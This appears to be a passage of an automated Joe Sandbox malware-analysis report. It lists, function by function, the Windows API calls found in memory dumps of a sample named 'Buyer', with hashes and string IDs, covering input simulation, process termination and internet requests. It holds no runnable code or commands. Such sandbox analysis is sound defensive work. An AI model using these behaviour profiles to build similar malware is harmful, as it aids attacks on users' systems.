                                                                                                    • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00FD43B4
                                                                                                    • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00FD43D1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$LongWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 312131281-0
                                                                                                    • Opcode ID: 43344491d215a96430f6317b9d44f8a3eaf822ca31525d3882d13c3c81216bd1
                                                                                                    • Instruction ID: bb84601ffafcf701b71a0324db11be7dd8e5680014c60f0388ff7d6429b20f1e
                                                                                                    • Opcode Fuzzy Hash: 43344491d215a96430f6317b9d44f8a3eaf822ca31525d3882d13c3c81216bd1
                                                                                                    • Instruction Fuzzy Hash: 24616A75900208AFDB20DFA8CC81EEE77B9EB09710F14015AFA54EB3A1D774AE41EB50
                                                                                                    APIs
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00FAB852
                                                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00FAA8E2,?,00000001), ref: 00FAB866
                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00FAB86D
                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FAA8E2,?,00000001), ref: 00FAB87C
                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00FAB88E
                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00FAA8E2,?,00000001), ref: 00FAB8A7
                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FAA8E2,?,00000001), ref: 00FAB8B9
                                                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00FAA8E2,?,00000001), ref: 00FAB8FE
                                                                                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00FAA8E2,?,00000001), ref: 00FAB913
                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00FAA8E2,?,00000001), ref: 00FAB91E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                    • String ID:
                                                                                                    • API String ID: 2156557900-0
                                                                                                    • Opcode ID: 588ce72b59f3a91b16fb02d8f9362b539468650ababbc65b7b72f8c7a3bf3511
                                                                                                    • Instruction ID: 4e15e5febb2d68fd323c81479973bca513e6710df812757528c0f840aa02138e
                                                                                                    • Opcode Fuzzy Hash: 588ce72b59f3a91b16fb02d8f9362b539468650ababbc65b7b72f8c7a3bf3511
                                                                                                    • Instruction Fuzzy Hash: 13318EF1A01208AFEB31DB25EC48FAA77A9EF46721F114015FA44D61A1D7BDD940AB60
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00F72FE4
                                                                                                      • Part of subcall function 00F72D18: RtlFreeHeap.NTDLL(00000000,00000000,?,00F7DB22,01011DB4,00000000,01011DB4,00000000,?,00F7DB49,01011DB4,00000007,01011DB4,?,00F7DF46,01011DB4), ref: 00F72D2E
                                                                                                      • Part of subcall function 00F72D18: GetLastError.KERNEL32(01011DB4,?,00F7DB22,01011DB4,00000000,01011DB4,00000000,?,00F7DB49,01011DB4,00000007,01011DB4,?,00F7DF46,01011DB4,01011DB4), ref: 00F72D40
                                                                                                    • _free.LIBCMT ref: 00F72FF0
                                                                                                    • _free.LIBCMT ref: 00F72FFB
                                                                                                    • _free.LIBCMT ref: 00F73006
                                                                                                    • _free.LIBCMT ref: 00F73011
                                                                                                    • _free.LIBCMT ref: 00F7301C
                                                                                                    • _free.LIBCMT ref: 00F73027
                                                                                                    • _free.LIBCMT ref: 00F73032
                                                                                                    • _free.LIBCMT ref: 00F7303D
                                                                                                    • _free.LIBCMT ref: 00F7304B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: 2792a61d7967d3d93b7a02b13cee0fab0a4bbd97ca5f58a629adc3eb95506410
                                                                                                    • Instruction ID: f2660d5b1b923938fbc9c0c25ee78f1726a228d786e5a83fa59d0719addd64cd
                                                                                                    • Opcode Fuzzy Hash: 2792a61d7967d3d93b7a02b13cee0fab0a4bbd97ca5f58a629adc3eb95506410
                                                                                                    • Instruction Fuzzy Hash: C311B676500109BFDB91EF54DC42CDD3BA9EF05350F6280A6FA0C9F622DA35DE50AB82
                                                                                                    APIs
                                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F44385
                                                                                                    • OleUninitialize.OLE32(?,00000000), ref: 00F44424
                                                                                                    • UnregisterHotKey.USER32(?), ref: 00F44609
                                                                                                    • DestroyWindow.USER32(?), ref: 00F83D80
                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00F83DE5
                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F83E12
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                    • String ID: close all
                                                                                                    • API String ID: 469580280-3243417748
                                                                                                    • Opcode ID: b5c48465dc33398738f951d7a94baae784b2b14f724048a7a8eeedbbd7d78c61
                                                                                                    • Instruction ID: 4eca138a08d858332d029eb2f7a333e6f0a222b73d335e64fdfd4214d8bd1a5f
                                                                                                    • Opcode Fuzzy Hash: b5c48465dc33398738f951d7a94baae784b2b14f724048a7a8eeedbbd7d78c61
                                                                                                    • Instruction Fuzzy Hash: 99D17D71B01212CFCB19EF14C895B69FBA5BF04B14F1542AEE94A7B261CB34AD12EF40
                                                                                                    APIs
                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FB871C
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00FB8730
                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00FB875A
                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00FB8774
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00FB8786
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00FB87CF
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00FB881F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectory$AttributesFile
                                                                                                    • String ID: *.*
                                                                                                    • API String ID: 769691225-438819550
                                                                                                    • Opcode ID: 22d71bbe1cee89de842db5c019ae10a38536d6957fde8387d53ac2502a961ea2
                                                                                                    • Instruction ID: a7971404f0f09f93e67fb1176ba977658b43998fa3bb604521739696b2b999f2
                                                                                                    • Opcode Fuzzy Hash: 22d71bbe1cee89de842db5c019ae10a38536d6957fde8387d53ac2502a961ea2
                                                                                                    • Instruction Fuzzy Hash: 85818F729042459BCB20EF15C854AEAB7EDABC4364F28482EF885D7250DF34DD46EF52
                                                                                                    APIs
                                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00F46337
                                                                                                      • Part of subcall function 00F463C7: GetClientRect.USER32(?,?), ref: 00F463ED
                                                                                                      • Part of subcall function 00F463C7: GetWindowRect.USER32(?,?), ref: 00F4642E
                                                                                                      • Part of subcall function 00F463C7: ScreenToClient.USER32(?,?), ref: 00F46456
                                                                                                    • GetDC.USER32 ref: 00F8509B
                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F850AE
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00F850BC
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00F850D1
                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00F850D9
                                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F8516A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                    • String ID: U
                                                                                                    • API String ID: 4009187628-3372436214
                                                                                                    • Opcode ID: 0a6445abdeab9d697912b2167647dd57b7521625554af4ba7f9e852c9531941f
                                                                                                    • Instruction ID: 10e717556478bdfc56196ebfaaf66171b3328354fee269c9c089b34c67a17584
                                                                                                    • Opcode Fuzzy Hash: 0a6445abdeab9d697912b2167647dd57b7521625554af4ba7f9e852c9531941f
                                                                                                    • Instruction Fuzzy Hash: 1171E231900A09DFCF25AF64CC88BFA3BB2FF45720F14026AED559A256C7358840FB51
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F59DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F59DE2
                                                                                                      • Part of subcall function 00F4135A: GetCursorPos.USER32(?), ref: 00F4136E
                                                                                                      • Part of subcall function 00F4135A: ScreenToClient.USER32(00000000,?), ref: 00F4138B
                                                                                                      • Part of subcall function 00F4135A: GetAsyncKeyState.USER32(00000001), ref: 00F413C2
                                                                                                      • Part of subcall function 00F4135A: GetAsyncKeyState.USER32(00000002), ref: 00F413DC
                                                                                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00FD9257
                                                                                                    • ImageList_EndDrag.COMCTL32 ref: 00FD925D
                                                                                                    • ReleaseCapture.USER32 ref: 00FD9263
                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00FD92FE
                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00FD9311
                                                                                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00FD93EB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                    • API String ID: 1924731296-2107944366
                                                                                                    • Opcode ID: c8b8ddc6ce18b937b5536b6537525fd1e638b6cc3d488b810576e438df0d880b
                                                                                                    • Instruction ID: baaa6a434b1c5c4e71eaa18d890cf55c1c440359b577c4aa1088b47d75a8c215
                                                                                                    • Opcode Fuzzy Hash: c8b8ddc6ce18b937b5536b6537525fd1e638b6cc3d488b810576e438df0d880b
                                                                                                    • Instruction Fuzzy Hash: 3751DE31504304AFD704EF24CC9AFAA7BEAFB88714F14061EF991572E1CBB99904EB52
                                                                                                    APIs
                                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00FBC9E1
                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FBCA09
                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00FBCA39
                                                                                                    • GetLastError.KERNEL32 ref: 00FBCA91
                                                                                                    • SetEvent.KERNEL32(?), ref: 00FBCAA5
                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00FBCAB0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3113390036-3916222277
                                                                                                    APIs
                                                                                                    • GetParent.USER32 ref: 00FA278D
                                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00FA27A2
                                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00FA282F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassMessageNameParentSend
                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                    • API String ID: 1290815626-3381328864
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 1282221369-0
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00FD5946
                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00FD5987
                                                                                                    • ShowWindow.USER32(?,00000005,?,00000000), ref: 00FD598D
                                                                                                    • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00FD5991
                                                                                                      • Part of subcall function 00FD7685: DeleteObject.GDI32(00000000), ref: 00FD76B1
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00FD59CD
                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00FD59DA
                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00FD5A0D
                                                                                                    • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00FD5A47
                                                                                                    • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00FD5A56
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                    • String ID:
                                                                                                    • API String ID: 3210457359-0
                                                                                                    APIs
                                                                                                    • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00F96F36
                                                                                                    • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00F96F4F
                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F96F5F
                                                                                                    • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00F96F77
                                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F96F98
                                                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00F58E0E,00000000,00000000,00000000,000000FF,00000000), ref: 00F96FA7
                                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F96FC4
                                                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00F58E0E,00000000,00000000,00000000,000000FF,00000000), ref: 00F96FD3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 1268354404-0
                                                                                                    APIs
                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00FBC8F1
                                                                                                    • GetLastError.KERNEL32 ref: 00FBC904
                                                                                                    • SetEvent.KERNEL32(?), ref: 00FBC918
                                                                                                      • Part of subcall function 00FBC9C2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00FBC9E1
                                                                                                      • Part of subcall function 00FBC9C2: GetLastError.KERNEL32 ref: 00FBCA91
                                                                                                      • Part of subcall function 00FBC9C2: SetEvent.KERNEL32(?), ref: 00FBCAA5
                                                                                                      • Part of subcall function 00FBC9C2: InternetCloseHandle.WININET(00000000), ref: 00FBCAB0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 337547030-0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00FA4128: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FA4142
                                                                                                      • Part of subcall function 00FA4128: GetCurrentThreadId.KERNEL32 ref: 00FA4149
                                                                                                      • Part of subcall function 00FA4128: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00FA2C95), ref: 00FA4150
                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FA2C9F
                                                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00FA2CBD
                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00FA2CC1
                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FA2CCB
                                                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00FA2CE3
                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00FA2CE7
                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FA2CF1
                                                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00FA2D05
                                                                                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00FA2D09
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2014098862-0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00FADAC1: CreateToolhelp32Snapshot.KERNEL32 ref: 00FADAE6
                                                                                                      • Part of subcall function 00FADAC1: Process32FirstW.KERNEL32(00000000,?), ref: 00FADAF4
                                                                                                      • Part of subcall function 00FADAC1: FindCloseChangeNotification.KERNEL32(00000000), ref: 00FADBC1
                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FCA8F4
                                                                                                    • GetLastError.KERNEL32 ref: 00FCA907
                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FCA93A
                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00FCA9EF
                                                                                                    • GetLastError.KERNEL32(00000000), ref: 00FCA9FA
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00FCAA4B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
